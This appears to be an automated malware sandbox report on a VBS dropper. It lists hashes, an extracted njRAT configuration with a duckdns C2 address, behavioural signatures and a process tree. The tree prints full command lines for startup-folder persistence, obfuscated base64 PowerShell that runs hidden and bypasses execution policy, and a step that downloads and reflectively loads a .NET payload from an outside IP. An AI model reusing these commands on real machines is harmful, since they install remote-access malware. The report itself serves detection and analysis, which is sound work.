Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
15-12-2021 18:00
Static task
static1
Behavioral task
behavioral1
Sample
5d536406d735e27d910faf1813d79e0b.vbs
Resource
win7-en-20211208
General
-
Target
5d536406d735e27d910faf1813d79e0b.vbs
-
Size
151KB
-
MD5
5d536406d735e27d910faf1813d79e0b
-
SHA1
32f7716ddb61131917a90b83eb7fd74ce5eef16a
-
SHA256
887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6
-
SHA512
1b797c0ada2656242d4017ecc33ce4045eece9a982cd4645e9e369e7d62ceed91e4f00ac14203077c349d8f815ed255d7fbe12742575e94f205bc319a9b365df
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted
njrat
0.7NC
NYAN CAT
njss.duckdns.org:57831
d51414327d6e
-
reg_key
d51414327d6e
-
splitter
@!#&^%$
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/828-422-0x000000000040CBBE-mapping.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeflow pid process 12 1608 powershell.exe 32 984 powershell.exe 33 2856 powershell.exe 34 1652 powershell.exe -
Drops startup file 5 IoCs
Processes:
powershell.exeRegSvcs.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x1.vbs RegSvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs RegSvcs.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 1608 set thread context of 3396 1608 powershell.exe RegSvcs.exe PID 984 set thread context of 1412 984 powershell.exe RegSvcs.exe PID 2856 set thread context of 3132 2856 powershell.exe RegSvcs.exe PID 1652 set thread context of 828 1652 powershell.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
RegSvcs.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings RegSvcs.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 1324 PING.EXE 3700 PING.EXE 3680 PING.EXE 3412 PING.EXE -
Suspicious behavior: EnumeratesProcesses 44 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4092 powershell.exe 4092 powershell.exe 4092 powershell.exe 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1608 powershell.exe 1016 powershell.exe 728 powershell.exe 1696 powershell.exe 728 powershell.exe 1016 powershell.exe 1696 powershell.exe 728 powershell.exe 1016 powershell.exe 1696 powershell.exe 1484 powershell.exe 1212 powershell.exe 3976 powershell.exe 1484 powershell.exe 1212 powershell.exe 3976 powershell.exe 1484 powershell.exe 1212 powershell.exe 3976 powershell.exe 2856 powershell.exe 984 powershell.exe 1652 powershell.exe 2856 powershell.exe 984 powershell.exe 1652 powershell.exe 2856 powershell.exe 984 powershell.exe 1652 powershell.exe 2856 powershell.exe 2856 powershell.exe 1652 powershell.exe 1652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
Processes:
powershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exeRegSvcs.exedescription pid process Token: SeDebugPrivilege 4092 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeDebugPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: SeDebugPrivilege 1652 powershell.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: SeDebugPrivilege 828 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: SeDebugPrivilege 1412 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe Token: 33 3396 RegSvcs.exe Token: SeIncBasePriorityPrivilege 3396 RegSvcs.exe Token: 33 1412 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1412 RegSvcs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.execmd.exepowershell.exepowershell.exeRegSvcs.exeWScript.exeWScript.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 3064 wrote to memory of 936 3064 WScript.exe cmd.exe PID 3064 wrote to memory of 936 3064 WScript.exe cmd.exe PID 936 wrote to memory of 1324 936 cmd.exe PING.EXE PID 936 wrote to memory of 1324 936 cmd.exe PING.EXE PID 936 wrote to memory of 4092 936 cmd.exe powershell.exe PID 936 wrote to memory of 4092 936 cmd.exe powershell.exe PID 3064 wrote to memory of 1852 3064 WScript.exe powershell.exe PID 3064 wrote to memory of 1852 3064 WScript.exe powershell.exe PID 1852 wrote to memory of 1608 1852 powershell.exe powershell.exe PID 1852 wrote to memory of 1608 1852 powershell.exe powershell.exe PID 1608 wrote to memory of 1268 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 1268 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 1268 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 372 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 372 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 372 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 1608 wrote to memory of 3396 1608 powershell.exe RegSvcs.exe PID 3396 wrote to memory of 712 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 712 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 712 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3992 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3992 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3992 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3932 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3932 3396 RegSvcs.exe WScript.exe PID 3396 wrote to memory of 3932 3396 RegSvcs.exe WScript.exe PID 3932 wrote to memory of 1800 3932 WScript.exe cmd.exe PID 3932 wrote to memory of 1800 3932 WScript.exe cmd.exe PID 3932 wrote to memory of 1800 3932 WScript.exe cmd.exe PID 3992 wrote to memory of 2672 3992 WScript.exe cmd.exe PID 3992 wrote to memory of 2672 3992 WScript.exe cmd.exe PID 3992 wrote to memory of 2672 3992 WScript.exe cmd.exe PID 2672 wrote to memory of 3680 2672 cmd.exe PING.EXE PID 2672 wrote to memory of 3680 2672 cmd.exe PING.EXE PID 2672 wrote to memory of 3680 2672 cmd.exe PING.EXE PID 3380 wrote to memory of 3700 3380 cmd.exe PING.EXE PID 3380 wrote to memory of 3700 3380 cmd.exe PING.EXE PID 3380 wrote to memory of 3700 3380 cmd.exe PING.EXE PID 1800 wrote to memory of 3412 1800 cmd.exe PING.EXE PID 1800 wrote to memory of 3412 1800 cmd.exe PING.EXE PID 1800 wrote to memory of 3412 1800 cmd.exe PING.EXE PID 3380 wrote to memory of 1016 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 1016 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 1016 3380 cmd.exe powershell.exe PID 1800 wrote to memory of 1696 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 1696 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 1696 1800 cmd.exe powershell.exe PID 2672 wrote to memory of 728 2672 cmd.exe powershell.exe PID 2672 wrote to memory of 728 2672 cmd.exe powershell.exe PID 2672 wrote to memory of 728 2672 cmd.exe powershell.exe PID 3932 wrote to memory of 1212 3932 WScript.exe powershell.exe PID 3932 wrote to memory of 1212 3932 WScript.exe powershell.exe PID 3932 wrote to memory of 1212 3932 WScript.exe powershell.exe PID 3992 wrote to memory of 1484 3992 WScript.exe powershell.exe PID 3992 wrote to memory of 1484 3992 WScript.exe powershell.exe PID 3992 wrote to memory of 1484 3992 WScript.exe powershell.exe PID 1484 wrote to memory of 2856 1484 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
PID:1324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:1268
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:372
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs"5⤵PID:712
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')6⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 107⤵
- Runs ping.exe
PID:3700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙FI☙QwBE☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.RCD/tset/94.91.142.19//:ptth'))"7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵PID:3336
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x1.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXQ.vbs')6⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 107⤵
- Runs ping.exe
PID:3680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXQ.vbs')7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵PID:1136
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵PID:3132
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')6⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 107⤵
- Runs ping.exe
PID:3412 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u